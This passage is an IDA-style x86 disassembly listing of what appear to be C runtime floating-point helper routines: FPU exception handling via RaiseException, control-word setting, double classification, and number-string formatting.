or dword ptr [eax+4], 10h
loc_41C3A2: ; CODE XREF: sub_41C325+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+Arguments]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+Arguments]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+Arguments]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+Arguments]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+Arguments]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_41CA45
test al, bl
jz short loc_41C42B
mov ecx, [ebp+Arguments]
or dword ptr [ecx+0Ch], 10h
loc_41C42B: ; CODE XREF: sub_41C325+FD�j
test al, 4
jz short loc_41C436
mov ecx, [ebp+Arguments]
or dword ptr [ecx+0Ch], 8
loc_41C436: ; CODE XREF: sub_41C325+108�j
test al, 8
jz short loc_41C441
mov ecx, [ebp+Arguments]
or dword ptr [ecx+0Ch], 4
loc_41C441: ; CODE XREF: sub_41C325+113�j
test al, 10h
jz short loc_41C44B
mov ecx, [ebp+Arguments]
or [ecx+0Ch], edi
loc_41C44B: ; CODE XREF: sub_41C325+11E�j
test al, 20h
jz short loc_41C455
mov eax, [ebp+Arguments]
or [eax+0Ch], ebx
loc_41C455: ; CODE XREF: sub_41C325+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_41C494
cmp eax, 400h
jz short loc_41C486
cmp eax, 800h
jz short loc_41C47A
cmp eax, ecx
jnz short loc_41C49A
mov eax, [ebp+Arguments]
or dword ptr [eax], 3
jmp short loc_41C49A
; ---------------------------------------------------------------------------
loc_41C47A: ; CODE XREF: sub_41C325+147�j
mov eax, [ebp+Arguments]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_41C490
; ---------------------------------------------------------------------------
loc_41C486: ; CODE XREF: sub_41C325+140�j
mov eax, [ebp+Arguments]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_41C490: ; CODE XREF: sub_41C325+15F�j
mov [eax], ecx
jmp short loc_41C49A
; ---------------------------------------------------------------------------
loc_41C494: ; CODE XREF: sub_41C325+139�j
mov eax, [ebp+Arguments]
and dword ptr [eax], 0FFFFFFFCh
loc_41C49A: ; CODE XREF: sub_41C325+14B�j
; sub_41C325+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_41C4C5
cmp eax, 200h
jz short loc_41C4B8
cmp eax, ecx
jnz short loc_41C4D2
mov eax, [ebp+Arguments]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_41C4D2
; ---------------------------------------------------------------------------
loc_41C4B8: ; CODE XREF: sub_41C325+185�j
mov eax, [ebp+Arguments]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_41C4D0
; ---------------------------------------------------------------------------
loc_41C4C5: ; CODE XREF: sub_41C325+17E�j
mov eax, [ebp+Arguments]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_41C4D0: ; CODE XREF: sub_41C325+19E�j
mov [eax], ecx
loc_41C4D2: ; CODE XREF: sub_41C325+189�j
; sub_41C325+191�j
mov eax, [ebp+Arguments]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+Arguments]
or [eax+20h], ebx
mov eax, [ebp+Arguments]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+Arguments]
fstp qword ptr [eax+10h]
mov eax, [ebp+Arguments]
or [eax+50h], ebx
mov eax, [ebp+Arguments]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+Arguments]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_41CA53
lea eax, [ebp+Arguments]
push eax ; lpArguments
push ebx ; nNumberOfArguments
push 0 ; dwExceptionFlags
push [ebp+dwExceptionCode] ; dwExceptionCode
call RaiseException ; RaiseException
mov eax, [ebp+Arguments]
test byte ptr [eax+8], 10h
jz short loc_41C54C
and dword ptr [esi], 0FFFFFFFEh
loc_41C54C: ; CODE XREF: sub_41C325+222�j
test byte ptr [eax+8], 8
jz short loc_41C555
and dword ptr [esi], 0FFFFFFFBh
loc_41C555: ; CODE XREF: sub_41C325+22B�j
test byte ptr [eax+8], 4
jz short loc_41C55E
and dword ptr [esi], 0FFFFFFF7h
loc_41C55E: ; CODE XREF: sub_41C325+234�j
test byte ptr [eax+8], 2
jz short loc_41C567
and dword ptr [esi], 0FFFFFFEFh
loc_41C567: ; CODE XREF: sub_41C325+23D�j
test [eax+8], bl
jz short loc_41C56F
and dword ptr [esi], 0FFFFFFDFh
loc_41C56F: ; CODE XREF: sub_41C325+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_41C5A3
dec ecx
jz short loc_41C597
dec ecx
jz short loc_41C58D
dec ecx
jnz short loc_41C5A5
or byte ptr [esi+1], 0Ch
jmp short loc_41C5A5
; ---------------------------------------------------------------------------
loc_41C58D: ; CODE XREF: sub_41C325+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_41C59F
; ---------------------------------------------------------------------------
loc_41C597: ; CODE XREF: sub_41C325+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_41C59F: ; CODE XREF: sub_41C325+270�j
mov [esi], ecx
jmp short loc_41C5A5
; ---------------------------------------------------------------------------
loc_41C5A3: ; CODE XREF: sub_41C325+257�j
and [esi], edx
loc_41C5A5: ; CODE XREF: sub_41C325+260�j
; sub_41C325+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_41C5C5
dec ecx
jz short loc_41C5BC
dec ecx
jnz short loc_41C5CE
and [esi], edx
jmp short loc_41C5CE
; ---------------------------------------------------------------------------
loc_41C5BC: ; CODE XREF: sub_41C325+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_41C5CC
; ---------------------------------------------------------------------------
loc_41C5C5: ; CODE XREF: sub_41C325+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_41C5CC: ; CODE XREF: sub_41C325+29E�j
mov [esi], ecx
loc_41C5CE: ; CODE XREF: sub_41C325+291�j
; sub_41C325+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41C325 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C5D8 proc near ; CODE XREF: sub_41C28D+10�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_41C603
test byte ptr [ebp+arg_8], bl
jz short loc_41C603
push ebx
call sub_41CA85
pop ecx
and edi, 0FFFFFFF7h
jmp loc_41C7CD
; ---------------------------------------------------------------------------
loc_41C603: ; CODE XREF: sub_41C5D8+15�j
; sub_41C5D8+1A�j
test al, 4
jz short loc_41C61D
test byte ptr [ebp+arg_8], 4
jz short loc_41C61D
push 4
call sub_41CA85
pop ecx
and edi, 0FFFFFFFBh
jmp loc_41C7CD
; ---------------------------------------------------------------------------
loc_41C61D: ; CODE XREF: sub_41C5D8+2D�j
; sub_41C5D8+33�j
test al, bl
jz loc_41C6F7
test byte ptr [ebp+arg_8], 8
jz loc_41C6F7
push 8
call sub_41CA85
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_41C6CF
cmp ecx, 400h
jz short loc_41C6A7
cmp ecx, 800h
jz short loc_41C67F
cmp ecx, eax
jnz loc_41C6EF
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_424800
fld qword ptr unk_440060
fnstsw ax
sahf
ja short loc_41C677
fchs
loc_41C677: ; CODE XREF: sub_41C5D8+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41C6ED
; ---------------------------------------------------------------------------
loc_41C67F: ; CODE XREF: sub_41C5D8+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_424800
fnstsw ax
sahf
jbe short loc_41C697
fld qword ptr unk_440050
jmp short loc_41C69F
; ---------------------------------------------------------------------------
loc_41C697: ; CODE XREF: sub_41C5D8+B5�j
fld qword ptr unk_440060
fchs
loc_41C69F: ; CODE XREF: sub_41C5D8+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41C6ED
; ---------------------------------------------------------------------------
loc_41C6A7: ; CODE XREF: sub_41C5D8+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_424800
fnstsw ax
sahf
jbe short loc_41C6BF
fld qword ptr unk_440060
jmp short loc_41C6C7
; ---------------------------------------------------------------------------
loc_41C6BF: ; CODE XREF: sub_41C5D8+DD�j
fld qword ptr unk_440050
fchs
loc_41C6C7: ; CODE XREF: sub_41C5D8+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41C6ED
; ---------------------------------------------------------------------------
loc_41C6CF: ; CODE XREF: sub_41C5D8+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_424800
fld qword ptr unk_440050
fnstsw ax
sahf
ja short loc_41C6E7
fchs
loc_41C6E7: ; CODE XREF: sub_41C5D8+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_41C6ED: ; CODE XREF: sub_41C5D8+A5�j
; sub_41C5D8+CD�j ...
fstp qword ptr [ecx]
loc_41C6EF: ; CODE XREF: sub_41C5D8+81�j
and edi, 0FFFFFFFEh
jmp loc_41C7CD
; ---------------------------------------------------------------------------
loc_41C6F7: ; CODE XREF: sub_41C5D8+47�j
; sub_41C5D8+51�j
test al, 2
jz loc_41C7CD
test byte ptr [ebp+arg_8], 10h
jz loc_41C7CD
push esi
xor esi, esi
test al, 10h
jz short loc_41C712
mov esi, ebx
loc_41C712: ; CODE XREF: sub_41C5D8+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp dbl_424800
fnstsw ax
sahf
jz loc_41C7BB
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_41C984
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_41C75D
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_41C7B1
; ---------------------------------------------------------------------------
loc_41C75D: ; CODE XREF: sub_41C5D8+17A�j
fld [ebp+var_C]
fcomp dbl_424800
fnstsw ax
sahf
jnb short loc_41C76F
mov edx, ebx
jmp short loc_41C771
; ---------------------------------------------------------------------------
loc_41C76F: ; CODE XREF: sub_41C5D8+191�j
xor edx, edx
loc_41C771: ; CODE XREF: sub_41C5D8+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_41C7A5
sub eax, ecx
loc_41C788: ; CODE XREF: sub_41C5D8+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_41C793
test esi, esi
jnz short loc_41C793
mov esi, ebx
loc_41C793: ; CODE XREF: sub_41C5D8+1B3�j
; sub_41C5D8+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_41C79F
or byte ptr [ebp+var_C+3], 80h
loc_41C79F: ; CODE XREF: sub_41C5D8+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_41C788
loc_41C7A5: ; CODE XREF: sub_41C5D8+1AC�j
test edx, edx
jz short loc_41C7B1
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_41C7B1: ; CODE XREF: sub_41C5D8+183�j
; sub_41C5D8+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_41C7BD
; ---------------------------------------------------------------------------
loc_41C7BB: ; CODE XREF: sub_41C5D8+14E�j
mov esi, ebx
loc_41C7BD: ; CODE XREF: sub_41C5D8+1E1�j
test esi, esi
pop esi
jz short loc_41C7CA
push 10h
call sub_41CA85
pop ecx
loc_41C7CA: ; CODE XREF: sub_41C5D8+1E8�j
and edi, 0FFFFFFFDh
loc_41C7CD: ; CODE XREF: sub_41C5D8+26�j
; sub_41C5D8+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_41C7E4
test byte ptr [ebp+arg_8], 20h
jz short loc_41C7E4
push 20h
call sub_41CA85
pop ecx
and edi, 0FFFFFFEFh
loc_41C7E4: ; CODE XREF: sub_41C5D8+1F9�j
; sub_41C5D8+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_41C5D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C7EF(int, int, int, int, int, int, double, int)
sub_41C7EF proc near ; CODE XREF: sub_41C23A+2B�p
; sub_41C28D+72�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_41C89D
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_41C85A
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_41CA62
lea eax, [ebp+var_20]
push eax
call sub_4202D0
add esp, 0Ch
test eax, eax
jnz short loc_41C854
push esi
call sub_41C877
pop ecx
loc_41C854: ; CODE XREF: sub_41C7EF+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41C85A: ; CODE XREF: sub_41C7EF+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_41CA62
push [ebp+arg_0]
call sub_41C877
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_41C7EF endp
; =============== S U B R O U T I N E =======================================
sub_41C877 proc near ; CODE XREF: sub_41C28D+7D�p
; sub_41C7EF+5F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_41C892
jle short locret_41C89C
cmp eax, 3
jg short locret_41C89C
mov dword ptr byte_445EDC+0D43E4h, 22h
retn
; ---------------------------------------------------------------------------
loc_41C892: ; CODE XREF: sub_41C877+7�j
mov dword ptr byte_445EDC+0D43E4h, 21h
locret_41C89C: ; CODE XREF: sub_41C877+9�j
; sub_41C877+E�j
retn
sub_41C877 endp
; =============== S U B R O U T I N E =======================================
sub_41C89D proc near ; CODE XREF: sub_41C7EF+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, 43FF78h
loc_41C8A4: ; CODE XREF: sub_41C89D+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_41C8BA
add eax, 8
inc ecx
cmp eax, 440050h
jl short loc_41C8A4
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C8BA: ; CODE XREF: sub_41C89D+D�j
mov eax, dword ptr unk_43FF7C[ecx*8]
retn
sub_41C89D endp
; =============== S U B R O U T I N E =======================================
sub_41C8C2 proc near ; CODE XREF: sub_41C28D+41�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_41C8CE
push 5
jmp short loc_41C8E4
; ---------------------------------------------------------------------------
loc_41C8CE: ; CODE XREF: sub_41C8C2+6�j
test al, 8
jz short loc_41C8D6
push 1
jmp short loc_41C8E4
; ---------------------------------------------------------------------------
loc_41C8D6: ; CODE XREF: sub_41C8C2+E�j
test al, 4
jz short loc_41C8DE
push 2
jmp short loc_41C8E4
; ---------------------------------------------------------------------------
loc_41C8DE: ; CODE XREF: sub_41C8C2+16�j
test al, 1
jz short loc_41C8E6
push 3
loc_41C8E4: ; CODE XREF: sub_41C8C2+A�j
; sub_41C8C2+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_41C8E6: ; CODE XREF: sub_41C8C2+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_41C8C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C8EF(double)
sub_41C8EF proc near ; CODE XREF: sub_418290:loc_418316�p
; sub_4183D7:loc_41845D�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_41C8EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C901(double, int)
sub_41C901 proc near ; CODE XREF: sub_41C984+82�p
; sub_41C984+98�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_41C901 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C92A proc near ; CODE XREF: sub_418290+31�p
; sub_4183D7+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_41C941
cmp [ebp+arg_0], edx
jnz short loc_41C953
push 1
jmp short loc_41C97D
; ---------------------------------------------------------------------------
loc_41C941: ; CODE XREF: sub_41C92A+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_41C953
cmp [ebp+arg_0], edx
jnz short loc_41C953
push 2
jmp short loc_41C97D
; ---------------------------------------------------------------------------
loc_41C953: ; CODE XREF: sub_41C92A+11�j
; sub_41C92A+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_41C966
push 3
jmp short loc_41C97D
; ---------------------------------------------------------------------------
loc_41C966: ; CODE XREF: sub_41C92A+36�j
cmp cx, 7FF0h
jnz short loc_41C980
test [ebp+arg_4], 7FFFFh
jnz short loc_41C97B
cmp [ebp+arg_0], edx
jz short loc_41C980
loc_41C97B: ; CODE XREF: sub_41C92A+4A�j
push 4
loc_41C97D: ; CODE XREF: sub_41C92A+15�j
; sub_41C92A+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41C980: ; CODE XREF: sub_41C92A+41�j
; sub_41C92A+4F�j
xor eax, eax
pop ebp
retn
sub_41C92A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C984(double, int)
sub_41C984 proc near ; CODE XREF: sub_41C5D8+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp dbl_424800
push esi
fnstsw ax
sahf
jnz short loc_41C9A4
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_41CA3A
; ---------------------------------------------------------------------------
loc_41C9A4: ; CODE XREF: sub_41C984+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_41CA13
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_41C9BC
cmp dword ptr [ebp+arg_0], ecx
jz short loc_41CA13
loc_41C9BC: ; CODE XREF: sub_41C984+31�j
fld [ebp+arg_0]
fcomp dbl_424800
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_41C9D4
push 1
pop eax
jmp short loc_41C9D6
; ---------------------------------------------------------------------------
loc_41C9D4: ; CODE XREF: sub_41C984+49�j
xor eax, eax
loc_41C9D6: ; CODE XREF: sub_41C984+4E�j
; sub_41C984+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_41C9EF
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_41C9E9
or dword ptr [ebp+arg_0+4], 1
loc_41C9E9: ; CODE XREF: sub_41C984+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_41C9D6
; ---------------------------------------------------------------------------
loc_41C9EF: ; CODE XREF: sub_41C984+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_41C9FD
or byte ptr [ebp+arg_0+7], 80h
loc_41C9FD: ; CODE XREF: sub_41C984+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_41C901
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_41CA3A
; ---------------------------------------------------------------------------
loc_41CA13: ; CODE XREF: sub_41C984+28�j
; sub_41C984+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_41C901
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_41CA3A: ; CODE XREF: sub_41C984+1B�j
; sub_41C984+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_41C984 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA45 proc near ; CODE XREF: sub_41C325+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_41CA45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA53 proc near ; CODE XREF: sub_41C325+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
sub_41CA53 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA62 proc near ; CODE XREF: sub_418290+13�p
; sub_418290+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_41CA62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA85 proc near ; CODE XREF: sub_41C5D8+1D�p
; sub_41C5D8+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_41CA9C
fld tbyte ptr unk_440078
fistp [ebp+arg_0]
wait
loc_41CA9C: ; CODE XREF: sub_41CA85+B�j
test cl, 8
jz short loc_41CAB1
fstsw ax
fld tbyte ptr unk_440078
fstp [ebp+var_8]
wait
fstsw ax
loc_41CAB1: ; CODE XREF: sub_41CA85+1A�j
test cl, 10h
jz short loc_41CAC0
fld tbyte ptr unk_440084
fstp [ebp+var_8]
wait
loc_41CAC0: ; CODE XREF: sub_41CA85+2F�j
test cl, 4
jz short loc_41CACE
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_41CACE: ; CODE XREF: sub_41CA85+3E�j
test cl, 20h
jz short locret_41CAD9
fldpi
fstp [ebp+var_8]
wait
locret_41CAD9: ; CODE XREF: sub_41CA85+4C�j
leave
retn
sub_41CA85 endp
; =============== S U B R O U T I N E =======================================
sub_41CADB proc near ; CODE XREF: .text:0041836E�p
push 30000h
push 10000h
call sub_420308
pop ecx
pop ecx
retn
sub_41CADB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CAED proc near ; CODE XREF: sub_41CB2B:loc_41CB4F�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld dbl_424810
fstp [ebp+var_8]
fld dbl_424808
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp dbl_424698
fnstsw ax
sahf
jbe short loc_41CB27
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_41CB27: ; CODE XREF: sub_41CAED+33�j
xor eax, eax
leave
retn
sub_41CAED endp
; =============== S U B R O U T I N E =======================================
sub_41CB2B proc near ; CODE XREF: .text:00418364�p
push offset aKernel32 ; "KERNEL32"
call dword ptr byte_4240F8
test eax, eax
jz short loc_41CB4F
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call dword ptr byte_4240D4
test eax, eax
jz short loc_41CB4F
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_41CB4F: ; CODE XREF: sub_41CB2B+D�j
; sub_41CB2B+1D�j
jmp sub_41CAED
sub_41CB2B endp
; =============== S U B R O U T I N E =======================================
sub_41CB54 proc near ; DATA XREF: sub_418377+1E�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax ; MultiByteStr
call sub_419841
cmp eax, 65h
pop ecx
jz short loc_41CB94
loc_41CB68: ; CODE XREF: sub_41CB54+3E�j
inc esi
cmp cbMultiByte, 1
jle short loc_41CB81
movsx eax, byte ptr [esi]
push 4 ; int
push eax ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41CB90
; ---------------------------------------------------------------------------
loc_41CB81: ; CODE XREF: sub_41CB54+1C�j
movsx eax, byte ptr [esi]
mov ecx, dword_43DD30
mov al, [ecx+eax*2]
and eax, 4
loc_41CB90: ; CODE XREF: sub_41CB54+2B�j
test eax, eax
jnz short loc_41CB68
loc_41CB94: ; CODE XREF: sub_41CB54+12�j
mov cl, byte_43DF40
mov al, [esi]
mov [esi], cl
inc esi
loc_41CB9F: ; CODE XREF: sub_41CB54+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41CB9F
pop esi
retn
sub_41CB54 endp
; ---------------------------------------------------------------------------
loc_41CBAE: ; DATA XREF: sub_418377+5�o
mov eax, [esp+4]
mov dl, byte_43DF40
mov cl, [eax]
test cl, cl
jz short loc_41CBCA
loc_41CBBE: ; CODE XREF: .text:0041CBC8�j
cmp cl, dl
jz short loc_41CBCA
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_41CBBE
loc_41CBCA: ; CODE XREF: .text:0041CBBC�j
; .text:0041CBC0�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_41CBFB
loc_41CBD1: ; CODE XREF: .text:0041CBE2�j
mov cl, [eax]
test cl, cl
jz short loc_41CBE4
cmp cl, 65h
jz short loc_41CBE4
cmp cl, 45h
jz short loc_41CBE4
inc eax
jmp short loc_41CBD1
; ---------------------------------------------------------------------------
loc_41CBE4: ; CODE XREF: .text:0041CBD5�j
; .text:0041CBDA�j ...
mov ecx, eax
loc_41CBE6: ; CODE XREF: .text:0041CBEA�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41CBE6
cmp [eax], dl
jnz short loc_41CBF1
dec eax
loc_41CBF1: ; CODE XREF: .text:0041CBEE�j
; .text:0041CBF9�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_41CBF1
locret_41CBFB: ; CODE XREF: .text:0041CBCF�j
retn
; ---------------------------------------------------------------------------
loc_41CBFC: ; DATA XREF: sub_418377+28�o
mov eax, [esp+4]
fld qword ptr [eax]
fcomp dbl_424800
fnstsw ax
sahf
jb short loc_41CC11
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41CC11: ; CODE XREF: .text:0041CC0B�j
xor eax, eax
retn
